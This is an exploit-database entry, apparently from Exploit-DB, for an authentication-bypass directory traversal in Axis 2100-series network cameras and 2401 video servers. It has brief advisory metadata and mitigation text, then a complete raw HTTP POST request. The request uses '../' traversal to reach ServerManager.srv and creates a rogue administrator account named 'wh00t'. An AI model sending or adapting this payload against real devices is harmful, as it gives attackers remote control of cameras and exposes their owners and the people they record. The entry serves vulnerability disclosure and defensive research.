header-logo
Suggest Exploit
vendor:
Axis 2100, 2110, 2120, 2420 network cameras; Axis 2130 network cameras; Axis 2401, and 2401 video servers
by:
5.5
CVSS
MEDIUM
Directory Traversal
22
CWE
Product Name: Axis 2100, 2110, 2120, 2420 network cameras; Axis 2130 network cameras; Axis 2401, and 2401 video servers
Affected Version From: 2.12
Affected Version To: 2.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Directory Traversal Vulnerability in HTTP POST Requests

A directory-traversal vulnerability in HTTP POST requests. This attack is demonstrated by an anonymous user calling protected administration scripts. This bypasses authentication checks and gives anonymous users remote administration of the devices.

Mitigation:

Upgrade to a version of the firmware that has been patched to fix this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11011/info

A directory-traversal vulnerability in HTTP POST requests. This attack is demonstrated by an anonymous user calling protected administration scripts. This bypasses authentication checks and gives anonymous users remote adminitration of the devices.
 
This issue is reported to affect:
- Axis 2100, 2110, 2120, 2420 network cameras with firmware versions 2.12 thru 2.40
- Axis 2130 network cameras
- Axis 2401,and 2401 video servers

POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0
Content-Length: 250
Pragma: no-cache

conf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&users=wh00t&username=wh00t&password1=wh00t&password2=wh00t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables